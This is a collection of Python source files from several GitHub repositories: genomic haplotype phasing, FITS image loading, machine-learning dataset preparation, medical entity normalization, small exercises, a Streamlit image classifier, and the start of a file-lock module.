pileupcolumn in bamh.pileup(\n self.nchr,\n pos - 1,\n pos,\n truncate=True,\n min_base_quality=self.MEAN_BASE_QUAL,\n ):\n bases = [a.upper() for a in pileupcolumn.get_query_sequences()]\n base_num = bases.count(hap_base)\n counts.append([base_num, len(bases) - base_num])\n\n probs = []\n nsites = len(sites)\n for n1, n2 in counts:\n probs.append(self.depth_prob(n1, n2 / other_cn))\n probs_fil = [a for a in probs if a[0] < 0.25]\n if len(probs_fil) >= nsites * 0.6 and nsites >= 5:\n two_cp_haps.append(hap)\n elif loose is True:\n if len(probs_fil) >= nsites * 0.5 and nsites >= 5:\n two_cp_haps.append(hap)\n\n return two_cp_haps\n\n def adjust_spurious_haplotypes(self, uniquely_supporting_reads, flanking_bp=10):\n \"\"\"Identify spurious haplotypes caused by locally misaligned reads\"\"\"\n passing_haplotypes = list(uniquely_supporting_reads.keys())\n suspicious_hap_pair = []\n lhap = uniquely_supporting_reads.keys()\n for hap1 in lhap:\n for hap2 in lhap:\n if hap1 != hap2:\n nmatch = 0\n nmismatch = 0\n mismatch_sites = []\n for i, base1 in enumerate(hap1):\n base2 = hap2[i]\n if \"x\" not in [base1, base2]:\n if base1 == base2:\n nmatch += 1\n elif base1 in [\"1\", \"2\"] and base2 in [\"1\", \"2\"]:\n nmismatch += 1\n mismatch_sites.append(self.het_sites[i])\n if nmatch >= 5 and nmismatch == 1 and len(mismatch_sites) == 1:\n mismatch_pos = int(mismatch_sites[0].split(\"_\")[0])\n hap1_reads = uniquely_supporting_reads[hap1]\n hap2_reads = uniquely_supporting_reads[hap2]\n hap_pair = None\n if len(hap1_reads) <= 5 and len(hap2_reads) >= 6:\n hap_pair = [hap2, hap1]\n elif len(hap2_reads) <= 5 and len(hap1_reads) >= 6:\n hap_pair = [hap1, hap2]\n if (\n hap_pair is not None\n and [\n hap_pair,\n mismatch_pos,\n ]\n not in suspicious_hap_pair\n ):\n suspicious_hap_pair.append([hap_pair, mismatch_pos])\n\n for hap_pair, mismatch_pos in suspicious_hap_pair:\n hap1, hap2 = hap_pair\n hap1_reads = uniquely_supporting_reads[hap1]\n hap2_reads = uniquely_supporting_reads[hap2]\n hap1_reads_at_pos = []\n hap2_reads_at_pos = []\n for pileupcolumn in self._bamh.pileup(\n self.nchr,\n mismatch_pos - 1,\n mismatch_pos,\n truncate=True,\n min_base_quality=self.MEAN_BASE_QUAL,\n ):\n for read in pileupcolumn.pileups:\n if not read.is_del and not read.is_refskip:\n read_name = read.alignment.query_name\n read_seq = read.alignment.query_sequence\n read_pos = read.query_position\n if (\n read_name in hap1_reads + hap2_reads\n and read_pos >= flanking_bp\n and read_pos + flanking_bp < len(read_seq)\n ):\n start_pos = read_pos - flanking_bp\n end_pos = read_pos + flanking_bp\n if read_name in hap1_reads:\n hap1_reads_at_pos.append(read_seq[start_pos:end_pos])\n if read_name in hap2_reads:\n hap2_reads_at_pos.append(read_seq[start_pos:end_pos])\n\n if set(hap1_reads_at_pos).intersection(set(hap2_reads_at_pos)) != set():\n passing_haplotypes.remove(hap2)\n return passing_haplotypes\n\n @staticmethod\n def check_linking_read(aln1, aln2, reverse=False):\n \"\"\"Determine the direction of links between two alignments\"\"\"\n if reverse is False:\n if aln1[-1] != \"x\" and aln2[0] != \"x\":\n return \"1-2\"\n if aln2[-1] != \"x\" and aln1[0] != \"x\":\n return \"2-1\"\n else:\n if aln1[-1] != \"x\" and aln2[-1] != \"x\":\n return \"0-0\"\n if aln1[0] != \"x\" and aln2[0] != \"x\":\n return \"0-0\"\n return None\n\n def phase_alleles(\n self,\n uniq_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n ass_haps,\n reverse=False,\n min_read=2,\n ):\n \"\"\"\n Phase haplotypes into alleles using read evidence\n \"\"\"\n new_reads = {}\n # unique\n for hap in uniq_reads:\n for read in uniq_reads[hap]:\n short_name = read.split(\"_sup\")[0]\n new_reads.setdefault(short_name, []).append({read: [hap]})\n # nonunique\n for read, supported_haps in nonuniquely_supporting_reads.items():\n short_name = read.split(\"_sup\")[0]\n new_reads.setdefault(short_name, []).append({read: supported_haps})\n\n (\n nondirected_links,\n directed_links,\n directed_links_loose,\n ) = self.get_directed_links(new_reads, raw_read_haps, ass_haps, reverse)\n\n read_links = {}\n for hap_link in nondirected_links:\n if len(nondirected_links[hap_link]) >= min_read:\n hap1, hap2 = hap_link.split(\"-\")\n read_links.setdefault(hap1, []).append(hap2)\n read_links.setdefault(hap2, []).append(hap1)\n read_links = dict(\n sorted(read_links.items(), key=lambda item: len(item[1]), reverse=True)\n )\n alleles = Phaser.get_alleles_from_links(read_links, ass_haps.values())\n return (\n alleles,\n read_links,\n {a: len(b) for a, b in directed_links.items()},\n {a: Counter(b) for a, b in directed_links_loose.items()},\n )\n\n def get_directed_links(self, new_reads, raw_read_haps, ass_haps, reverse):\n \"\"\"Get links between haplotypes from reads\"\"\"\n nondirected_links = {}\n directed_links = {}\n directed_links_loose = {}\n for read, hap_info in new_reads.items():\n nsegment = len(hap_info)\n if nsegment >= 2:\n links_found = set()\n for i in range(nsegment):\n for j in range(i + 1, nsegment):\n hap_info1 = hap_info[i]\n hap_info2 = hap_info[j]\n read1, haps1 = list(hap_info1.items())[0]\n read2, haps2 = list(hap_info2.items())[0]\n aln1 = raw_read_haps[read1]\n aln2 = raw_read_haps[read2]\n check_link = self.check_linking_read(aln1, aln2, reverse)\n if len(haps1) == 1 and len(haps2) == 1:\n hap1 = haps1[0]\n hap2 = haps2[0]\n if hap1 != hap2:\n hap1_renamed = ass_haps[hap1]\n hap2_renamed = ass_haps[hap2]\n link_to_add = f\"{hap1_renamed}-{hap2_renamed}\"\n if link_to_add not in links_found:\n links_found.add(link_to_add)\n nondirected_links.setdefault(\n link_to_add, []\n ).append(1)\n if check_link is not None and check_link in [\n \"1-2\",\n \"0-0\",\n ]:\n directed_links.setdefault(\n f\"{hap1_renamed}-{hap2_renamed}\", []\n ).append(1)\n directed_links_loose.setdefault(\n hap1_renamed, []\n ).append(hap2_renamed)\n elif check_link is not None and check_link in [\n \"2-1\",\n \"0-0\",\n ]:\n directed_links.setdefault(\n f\"{hap2_renamed}-{hap1_renamed}\", []\n ).append(1)\n directed_links_loose.setdefault(\n hap2_renamed, []\n ).append(hap1_renamed)\n elif len(haps1) == 1 or len(haps2) == 1:\n for hap1 in haps1:\n for hap2 in haps2:\n if hap1 != hap2:\n hap1_renamed = ass_haps[hap1]\n hap2_renamed = ass_haps[hap2]\n if check_link is not None and check_link in [\n \"1-2\",\n \"0-0\",\n ]:\n directed_links_loose.setdefault(\n hap1_renamed, []\n ).append(hap2_renamed)\n elif check_link is not None and check_link in [\n \"2-1\",\n \"0-0\",\n ]:\n directed_links_loose.setdefault(\n hap2_renamed, []\n ).append(hap1_renamed)\n return nondirected_links, directed_links, directed_links_loose\n\n @staticmethod\n def get_alleles_from_links(read_links, total_haps):\n \"\"\"phase alleles from read_links between reads\"\"\"\n alleles = []\n if read_links != {}:\n alleles = [[list(read_links.keys())[0]] + list(read_links.values())[0]]\n for hap1 in read_links:\n for hap2 in read_links[hap1]:\n hap1_in = sum([hap1 in a for a in alleles])\n hap2_in = sum([hap2 in a for a in alleles])\n if hap1_in == 0 and hap2_in == 0:\n alleles.append([hap1, hap2])\n elif hap1_in == 0:\n for a in alleles:\n if hap2 in a:\n a_index = alleles.index(a)\n if hap1 not in alleles[a_index]:\n alleles[a_index].append(hap1)\n if hap2 not in alleles[a_index]:\n alleles[a_index].append(hap2)\n else:\n for a in alleles:\n if hap1 in a:\n a_index = alleles.index(a)\n if hap2 not in alleles[a_index]:\n alleles[a_index].append(hap2)\n if hap1 not in alleles[a_index]:\n alleles[a_index].append(hap1)\n # merge alleles\n while True:\n to_merge = []\n for hap in total_haps:\n hap_found_in_alleles = [hap in a for a in alleles]\n if hap_found_in_alleles.count(True) > 1:\n to_merge.append(hap)\n break\n if to_merge == []:\n break\n new_alleles = []\n hap = to_merge[0]\n merged = []\n for each_allele in alleles:\n if hap not in each_allele:\n new_alleles.append(each_allele)\n else:\n merged += each_allele\n merged = list(set(merged))\n new_alleles.append(merged)\n alleles = new_alleles\n return alleles\n\n def call(self):\n \"\"\"Main function to phase haplotypes and call copy numbers\"\"\"\n if self.check_coverage_before_analysis() is False:\n return self.GeneCall()\n self.get_homopolymer()\n self.get_candidate_pos()\n self.het_sites = sorted(list(self.candidate_pos))\n self.remove_noisy_sites()\n\n raw_read_haps = self.get_haplotypes_from_reads()\n\n (\n ass_haps,\n original_haps,\n hcn,\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n read_counts,\n ) = self.phase_haps(raw_read_haps)\n\n tmp = {}\n mod_gene_name = \",\".join(self.gene.split(\"-\"))\n for i, hap in enumerate(ass_haps):\n tmp.setdefault(hap, f\"{mod_gene_name}_hap{i+1}\")\n ass_haps = tmp\n\n haplotypes = None\n dvar = None\n if ass_haps != {}:\n haplotypes, dvar = self.output_variants_in_haplotypes(\n ass_haps,\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n )\n\n two_cp_haps = self.compare_depth(haplotypes)\n total_cn = len(ass_haps) + len(two_cp_haps)\n\n # phase\n alleles = []\n hap_links = {}\n if self.to_phase is True:\n (\n alleles,\n hap_links,\n _,\n _,\n ) = self.phase_alleles(\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n ass_haps,\n reverse=self.is_reverse,\n )\n self.close_handle()\n\n return self.GeneCall(\n total_cn,\n None,\n ass_haps,\n two_cp_haps,\n alleles,\n hap_links,\n hcn,\n original_haps,\n self.het_sites,\n uniquely_supporting_reads,\n self.het_no_phasing,\n self.homo_sites,\n haplotypes,\n dvar,\n nonuniquely_supporting_reads,\n raw_read_haps,\n self.mdepth,\n )\n\n def close_handle(self):\n self._bamh.close()\n self._refh.close()\n","repo_name":"PacificBiosciences/paraphase","sub_path":"paraphase/phaser.py","file_name":"phaser.py","file_ext":"py","file_size_in_byte":55387,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"} +{"seq_id":"17917470597","text":"__all__ = ['BenchmarkImage',\n 'benchmark_image_generator',\n 'load_benchmark_images']\n\nfrom astropy.io import fits\n\nimport collections\n\nimport numpy as np\n\nfrom pywi.io.images import image_files_in_paths\n\n\n# IMAGE OBJECT ###############################################################\n\nBenchmarkImage = collections.namedtuple('BenchmarkImage', ('input_image',\n 'reference_image',\n 'metadata'))\n\n\n# IMAGE GENERATOR ############################################################\n\ndef benchmark_image_generator(path_list,\n max_num_images=None,\n **kwargs):\n \"\"\"Return an iterable sequence all calibrated images in `path_list`.\n\n Parameters\n ----------\n path_list\n The path of files containing the images to extract. It can contain\n FITS/Simtel files and directories.\n max_num_images\n The maximum number of images to iterate.\n\n Yields\n ------\n Image1D or Image2D\n The named tuple `Image1D` or `Image1D` of the next FITS or Simtel files\n in `path_list`.\n \"\"\"\n\n images_counter = 0\n\n for file_path in image_files_in_paths(path_list):\n if (max_num_images is not None) and (images_counter >= max_num_images):\n break\n else:\n if file_path.lower().endswith((\".fits\", \".fit\")):\n # FITS FILES\n benchmark_image = load_benchmark_images(file_path)\n images_counter += 1\n yield benchmark_image\n else:\n raise Exception(\"Wrong item:\", file_path)\n\n\n# LOAD FITS BENCHMARK IMAGE ##################################################\n\ndef load_benchmark_images(file_path):\n \"\"\"Return images contained in the given FITS file.\n\n Parameters\n ----------\n file_path : str\n The path of the FITS file to load\n\n Returns\n -------\n dict\n A dictionary containing the loaded images and their metadata\n\n Raises\n ------\n WrongFitsFileStructure\n If `file_path` doesn't contain a valid structure\n \"\"\"\n\n hdu_list = fits.open(file_path) # open the FITS file\n\n # METADATA ################################################################\n\n hdu0 = hdu_list[0]\n\n metadata = {}\n\n for key, val in hdu0.header.items():\n metadata[key] = val\n\n # IMAGES ##################################################################\n\n if (len(hdu_list) != 2) or (not hdu_list[0].is_image) or (not hdu_list[1].is_image):\n hdu_list.close()\n raise WrongFitsFileStructure(file_path)\n\n hdu0, hdu1 = hdu_list\n\n input_image = hdu0.data # \"hdu.data\" is a Numpy Array\n reference_image = hdu1.data # \"hdu.data\" is a Numpy Array\n\n hdu_list.close()\n\n benchmark_image = BenchmarkImage(input_image=input_image,\n reference_image=reference_image,\n metadata=metadata)\n\n return benchmark_image\n","repo_name":"jeremiedecock/pywi","sub_path":"pywi/benchmark/io/refbased/fits.py","file_name":"fits.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73589961830","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\n\nSEED = 2\n\ndef one_hot_df(df, scaler=None, test=False, discrete=False):\n df_cols = df.select_dtypes('object')\n df_1 = df.drop(columns = df_cols).drop(columns = ['target'])\n if scaler:\n if test:\n df_1 = pd.DataFrame(scaler.transform(df_1.values))\n else:\n df_1 = pd.DataFrame(scaler.fit_transform(df_1.values))\n df_2 = pd.get_dummies(df[list(df_cols)])\n \n if discrete:\n return pd.concat([df_2, df[['target']]], axis=1) \n \n return (pd.concat([df_1, df_2, df[['target']]], axis=1))\n\ndef get_hepatitis_dataframes(discrete=False):\n df = pd.read_csv('data/hepatitis.data', header=None).rename(columns = {0:'target'})\n df.target = df.target.apply(lambda x: 1 if x==1 else -1)\n df=one_hot_df(df, discrete=discrete)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_votes_dataframes():\n df = pd.read_csv('data/house-votes-84.data', header=None).rename(columns = {0:'target'})\n df.target = df.target.apply(lambda x: 1 if x=='democrat' else -1)\n df=one_hot_df(df)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_kr_kp_dataframes():\n df = pd.read_csv('data/kr-vs-kp.data', header=None).rename(columns = {36:'target'})\n df.target = df.target.apply(lambda x: 1 if x=='won' else -1)\n df=one_hot_df(df)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_prometers_dataframes(discrete=False):\n df = pd.read_csv('data/promoters.data', header=None).drop(columns=[0]).rename(columns = {58:'target'})\n df.target = df.target.apply(lambda x: 1 if x=='+' else -1)\n df = one_hot_df(df, discrete=discrete)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_credits_dataframes(discrete=False):\n df = pd.read_csv('data/crx.data', header=None).rename(columns = {15:'target'})\n df[1]=df[1].replace('?', '0').apply(eval)\n df.target = df.target.apply(lambda x: 1 if x=='+' else -1)\n df=one_hot_df(df, discrete=discrete)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_adults_dataframes(discrete=False):\n column_names = ['age', 'workclass', 'fnlwgt', 'education', 'educational-num',\\\n 'marital-status', 'occupation', 'relationship', 'race',\\\n 'gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country','income']\n df_train = pd.read_csv('data/adult.data', header=None).rename(columns = {14:'target'})\n df_train.target = df_train.target.apply(lambda x: 1 if x==' >50K' else -1)\n \n df_test = pd.read_csv('data/adult.test', skiprows=1, header=None).rename(columns = {14:'target'})\n df_test.target = df_test.target.apply(lambda x: 1 if x==' >50K.' else -1)\n \n scaler = StandardScaler()\n \n df_train = one_hot_df(df_train, scaler, discrete=discrete)\n df_train = df_train.drop(columns = ['13_ Holand-Netherlands'])\n \n df_test = one_hot_df(df_test, scaler, test=True, discrete=discrete)\n \n return df_train, df_test\n\ndef split_dataframe(df):\n return df.drop(columns=['target']).values, df['target'][:, None]\n\ndef get_train_test(df_train, df_test):\n X_train, y_train = split_dataframe(df_train)\n X_test, y_test = split_dataframe(df_test)\n \n return X_train, y_train, X_test, y_test\n\ndef get_dataset(name, discrete=False):\n if name=='adult':\n df_train, df_test = get_adults_dataframes(discrete=discrete) \n elif name=='credits':\n df_train, df_test = get_credits_dataframes(discrete=discrete)\n elif name=='kr-vs-kp':\n df_train, df_test = get_kr_kp_dataframes()\n elif name=='promoters':\n df_train, df_test = get_prometers_dataframes()\n elif name=='votes':\n df_train, df_test = get_votes_dataframes()\n elif name=='hepatitis':\n df_train, df_test = get_hepatitis_dataframes(discrete=discrete)\n \n X_train, y_train, X_test, y_test = get_train_test(df_train, df_test)\n return X_train, y_train, X_test, y_test","repo_name":"KaloshinPE/MEM_detector","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7597374276","text":"# -*- coding:utf-8 -*-\nimport json\nimport pickle\nimport random\n\nimport tensorflow as tf\n\nfrom entity_normalization.esim import ESIM\nfrom entity_normalization.data_helper import pad_sequences\nfrom entity_normalization.bm25_retrival import BM25Retrieval\nfrom keras.backend.tensorflow_backend import set_session\nfrom entity_normalization.config import data_params, esim_params, MODEL_DIR\n\n\nclass EntityMatch(object):\n def __init__(self, kb_path):\n super(EntityMatch, self).__init__()\n self.kb_path = kb_path\n self.bm25re = BM25Retrieval(self.kb_path)\n\n self.word2idx, _ = pickle.load(open(esim_params['word2id'], \"rb\"))\n self.model = ESIM(esim_params).build()\n self.model.load_weights(esim_params['model_save_path'])\n\n def char_index(self, p_sentences, h_sentences):\n p_list, h_list = [], []\n for p_sentence, h_sentence in zip(p_sentences, h_sentences):\n p = [self.word2idx[word.lower()] for word in p_sentence if\n len(word.strip()) > 0 and word.lower() in self.word2idx.keys()]\n h = [self.word2idx[word.lower()] for word in h_sentence if\n len(word.strip()) > 0 and word.lower() in self.word2idx.keys()]\n\n p_list.append(p)\n h_list.append(h)\n\n p_list = pad_sequences(p_list, maxlen=esim_params['input_shapes'][0][0])\n h_list = pad_sequences(h_list, maxlen=esim_params['input_shapes'][0][0])\n\n return p_list, h_list\n\n def predict(self, query):\n cand_docs = self.bm25re.retrieval(query, 20)\n querys = [query] * len(cand_docs)\n\n p, h = self.char_index(querys, cand_docs)\n\n scores = self.model.predict([p, h])\n scores = scores[:, 1]\n match_score = {e: s for e, s in zip(cand_docs, scores)}\n match_score = sorted(match_score.items(), key=lambda x: x[1], reverse=True)\n return match_score[0], cand_docs\n\n\nclass Entity_Normalization(object):\n def __init__(self):\n super(Entity_Normalization, self).__init__()\n self.model = EntityMatch(data_params['code_file'])\n\n def predict(self, texts, threshold=0.8):\n if isinstance(texts, str):\n pred, cand_docs = self.model.predict(texts)\n if pred[1] > threshold:\n return pred[0]\n else:\n return texts\n\n elif isinstance(texts, list):\n results = []\n for text in texts:\n pred, cand_docs = self.model.predict(text)\n if pred[1] > threshold:\n results.append(pred[0])\n else:\n results.append(text)\n return results\n\n else:\n return \"不支持该输入类型!\"\n\n\ndef BD_search(word):\n file_path = MODEL_DIR + \"alias_dict.json\"\n with open(file_path, 'r') as f:\n data = json.load(f)\n\n if word in data.keys():\n return random.choice(data[word])\n else:\n return None\n\n\nglobal graph, sess\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\ngraph = tf.get_default_graph()\nset_session(sess)\n\nEMM = Entity_Normalization()\n\n\ndef EMM_model(word, e_type=\"disease\"):\n \"\"\"\n function: 实体规范化\n 增加BD_search优化规范化效果\n e_type: 规范化的实体类型,TODO\n \"\"\"\n bd_ans = BD_search(word)\n if bd_ans:\n return bd_ans\n\n with graph.as_default():\n set_session(sess)\n result = EMM.predict(word)\n return result\n\n\nif __name__ == '__main__':\n while True:\n text = input(\"请输入:\")\n with graph.as_default():\n set_session(sess)\n result = EMM.predict(text)\n print(result)\n","repo_name":"loveleaves/Medical_ChatBot","sub_path":"Web_Font&server/entity_normalization/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21951106678","text":"# Assignment 2_3\t\tFactorial\r\n\r\ndef Fact(value):\r\n\tans=1\r\n\ti=0;\r\n\tfor i in range(value):\r\n\t\tans = value*ans\r\n\t\tvalue =value-1\r\n\treturn ans\r\n\r\ndef main ():\r\n\tcount=int(input(\"Enter the number for factorial : \")) \r\n\tret=Fact(count)\r\n\tprint(ret)\r\n\t\r\nif __name__==\"__main__\":\r\n\tmain();\t\t","repo_name":"Abhijeet-Kalathil-1000/Python","sub_path":"Python/Application/Factorial.py","file_name":"Factorial.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"72654291429","text":"#Numero de componentes de ambos vectores\nn = int(input())\n\n#Vector 1\nvec1 = input()\nvec1 = vec1.split(\" \")\nvec1 = [int(x) for x in vec1]\n\n#Vector 2\nvec2 = input()\nvec2 = vec2.split(\" \")\nvec2 = [int(x) for x in vec2]\n\n#Se inicializa un acumulador\nproductoPunto = 0\n\n#Se suman los productos de las componentes de los vectores al acumulador\nfor i, componente in enumerate(vec1):\n productoPunto = productoPunto + vec1[i]*vec2[i]\n\nprint(productoPunto)","repo_name":"IYahirMP/ProgramacionOct22","sub_path":"Basic level/Producto punto de dos vectores/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32002789234","text":"#https://github.com/streamlit/streamlit/issues/511\r\n#pip install --upgrade protobuf\r\n#pip install streamlit\r\n\r\nimport streamlit as st\r\nimport cv2 \r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import Image,ImageEnhance\r\n\r\nfrom tensorflow.keras.preprocessing.image import load_img\r\nfrom tensorflow.keras.preprocessing.image import img_to_array\r\nfrom keras.applications.imagenet_utils import decode_predictions\r\nimport time\r\n\r\n\r\n# import the models for further classification experiments\r\nfrom tensorflow.keras.applications import (\r\n vgg16,\r\n resnet50,\r\n mobilenet,\r\n inception_v3\r\n )\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n# imports for reproducibility\r\nimport tensorflow as tf\r\nimport random\r\nimport os\r\n\r\ndef vgg16_predict(cam_frame, image_size):\r\n frame= cv2.resize(cam_frame, (image_size, image_size))\r\n numpy_image = img_to_array(frame)\r\n image_batch = np.expand_dims(numpy_image, axis=0)\r\n processed_image = vgg16.preprocess_input(image_batch.copy())\r\n\r\n # get the predicted probabilities for each class\r\n predictions = model.predict(processed_image)\r\n # print predictions\r\n # convert the probabilities to class labels\r\n # we will get top 5 predictions which is the default\r\n label_vgg = decode_predictions(predictions)\r\n # print VGG16 predictions\r\n #for prediction_id in range(len(label_vgg[0])):\r\n # print(label_vgg[0][prediction_id])\r\n \r\n # format final image visualization to display the results of experiments\r\n cv2.putText(cam_frame, \"VGG16: {}, {:.2f}\".format(label_vgg[0][0][1], label_vgg[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame\r\n\r\ndef resnet50_predict(cam_frame, image_size):\r\n frame= cv2.resize(cam_frame, (image_size, image_size))\r\n numpy_image = img_to_array(frame)\r\n image_batch = np.expand_dims(numpy_image, axis=0)\r\n \r\n # prepare the image for the ResNet50 model\r\n processed_image = resnet50.preprocess_input(image_batch.copy())\r\n # get the predicted probabilities for each class\r\n predictions = model.predict(processed_image)\r\n # convert the probabilities to class labels\r\n # If you want to see the top 3 predictions, specify it using the top argument\r\n label_resnet = decode_predictions(predictions, top=3)\r\n # print ResNet predictions\r\n #for prediction_id in range(len(label_resnet[0])):\r\n # print(label_resnet[0][prediction_id])\r\n \r\n # format final image visualization to display the results of experiments\r\n #cv2.putText(cam_frame, \"VGG16: {}, {:.2f}\".format(label_vgg[0][0][1], label_vgg[0][0][2]) , (50, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)\r\n #cv2.putText(cam_frame, \"MobileNet: {}, {:.2f}\".format(label_mobilenet[0][0][1], label_mobilenet[0][0][2]) , (50, 75), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)\r\n #cv2.putText(cam_frame, \"Inception: {}, {:.2f}\".format(label_inception[0][0][1], label_inception[0][0][2]) , (50, 110), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)\r\n cv2.putText(cam_frame, \"ResNet50: {}, {:.2f}\".format(label_resnet[0][0][1], label_resnet[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame \r\n\r\ndef mobilenet_predict(cam_frame, image_size):\r\n frame= cv2.resize(cam_frame, (image_size, image_size))\r\n numpy_image = img_to_array(frame)\r\n image_batch = np.expand_dims(numpy_image, axis=0)\r\n \r\n # prepare the image for the MobileNet model\r\n processed_image = mobilenet.preprocess_input(image_batch.copy())\r\n\r\n # get the predicted probabilities for each class\r\n predictions = model.predict(processed_image)\r\n\r\n # convert the probabilities to imagenet class labels\r\n label_mobilenet = decode_predictions(predictions)\r\n # print MobileNet predictions\r\n #for prediction_id in range(len(label_mobilenet[0])):\r\n # print(label_mobilenet[0][prediction_id])\r\n \r\n # format final image visualization to display the results of experiments\r\n cv2.putText(cam_frame, \"MobileNet: {}, {:.2f}\".format(label_mobilenet[0][0][1], label_mobilenet[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame \r\n \r\ndef inception_v3_predict(cam_frame, image_size):\r\n frame= cv2.resize(cam_frame, (image_size, image_size))\r\n numpy_image = img_to_array(frame)\r\n image_batch = np.expand_dims(numpy_image, axis=0)\r\n processed_image = inception_v3.preprocess_input(image_batch.copy())\r\n\r\n # get the predicted probabilities for each class\r\n predictions = model.predict(processed_image)\r\n # print predictions\r\n # convert the probabilities to class labels\r\n # we will get top 5 predictions which is the default\r\n label_inception = decode_predictions(predictions)\r\n # print Inception predictions\r\n #for prediction_id in range(len(label_inception[0])):\r\n # print(label_inception[0][prediction_id])\r\n \r\n # format final image visualization to display the results of experiments\r\n cv2.putText(cam_frame, \"Inception: {}, {:.2f}\".format(label_inception[0][0][1], label_inception[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame \r\n\r\nmode = 1\r\nmodel = vgg16.VGG16(weights='imagenet')\r\nimage_size = 224\r\n\r\ndef select_models():\r\n st.sidebar.markdown(\"# Image Classification\")\r\n option = st.sidebar.selectbox(\r\n 'Select a Deep Learning Model:',\r\n [\"VGG16\",\"RESNET50\",\"MOBILENET\",\"INCEPTION_V3\"], index=0)\r\n st.sidebar.write('You selected:', option)\r\n if option == \"VGG16\":\r\n model = vgg16.VGG16(weights='imagenet')\r\n image_size = 224\r\n mode = 1\r\n elif option == \"RESNET50\":\r\n model = resnet50.ResNet50(weights='imagenet')\r\n image_size = 224\r\n mode = 2\r\n elif option == \"MOBILENET\":\r\n model = mobilenet.MobileNet(weights='imagenet')\r\n image_size = 224\r\n mode = 3\r\n \r\n elif option == \"INCEPTION_V3\":\r\n model = inception_v3.InceptionV3(weights='imagenet')\r\n image_size = 299\r\n mode = 4\r\n return mode\r\n\r\ndef classify_image(frame,mode):\r\n if mode == 1:\r\n frame = vgg16_predict(frame, image_size)\r\n elif mode == 2:\r\n frame = resnet50_predict(frame, image_size)\r\n elif mode == 3:\r\n frame = mobilenet_predict(frame, image_size)\r\n elif mode == 4:\r\n frame = inception_v3_predict(frame, image_size)\r\n return frame\r\n\r\ndef main():\r\n \"\"\"Image Classification App\"\"\"\r\n\r\n st.title(\"Image Classification App\")\r\n st.text(\"Build with Streamlit and OpenCV\")\r\n activities = [\"Image Classification\",\"About\"]\r\n choice = st.sidebar.selectbox(\"Select Activty\",activities)\r\n if choice == 'Image Classification':\r\n mode = select_models()\r\n image_file = st.file_uploader(\"Upload Image\",type=['jpg','png','jpeg'])\r\n\r\n if image_file is not None:\r\n our_image = Image.open(image_file)\r\n st.text(\"Original Image\")\r\n # st.write(type(our_image))\r\n st.image(our_image)\r\n #convert to CV2 format\r\n new_img = np.array(our_image.convert('RGB'))\r\n image = cv2.cvtColor(new_img,1)\r\n # Get the boxes for the objects detected by YOLO by running the YOLO model.\r\n image = classify_image(image,mode)\r\n st.text(\"Classification Image\")\r\n st.image(image.astype(np.uint8), use_column_width=True)\r\n\r\n elif choice == 'About':\r\n st.subheader(\"About Image Classification App\")\r\n st.markdown(\"Built with Streamlit by [LSBU](https://www.lsbu.ac.uk/)\")\r\n st.text(\"Professor Perry Xiao\")\r\n st.success(\"Copyright @ 2020 London South Bank University\")\r\nif __name__ == '__main__':\r\n main()\t\r\n","repo_name":"PerryXiao2015/streamlit-file-image-classification","sub_path":"StreamlitFileImageClassification.py","file_name":"StreamlitFileImageClassification.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"31738316687","text":"import os\nimport tempfile\nimport time\n\n\n__all__ = (\"NamedAtomicLock\",)\n\n__version__ = \"1.1.3\"\n\n__version_tuple__ = (1, 1, 3)\n\nDEFAULT_POLL_TIME = 0.1\n\ntry:\n FileNotFoundError\nexcept:\n FileNotFoundError = OSError\n\n\nclass NamedAtomicLock(object):\n def __init__(self, name, lockDir=None, maxLockAge=None):\n \"\"\"\n NamedAtomicLock - Create a NamedAtomicLock.\n This uses a named directory, which is defined by POSIX as an atomic operation.\n @param name - The lock name, Cannot contain directory seperator (like '/')\n @param lockDir - Directory in which to store locks. Defaults to tempdir\n @param maxLockAge - Maximum number of seconds lock can be held before it is considered \"too old\" and fair game to be taken.\n You should likely define this as a reasonable number, maybe 4x as long as you 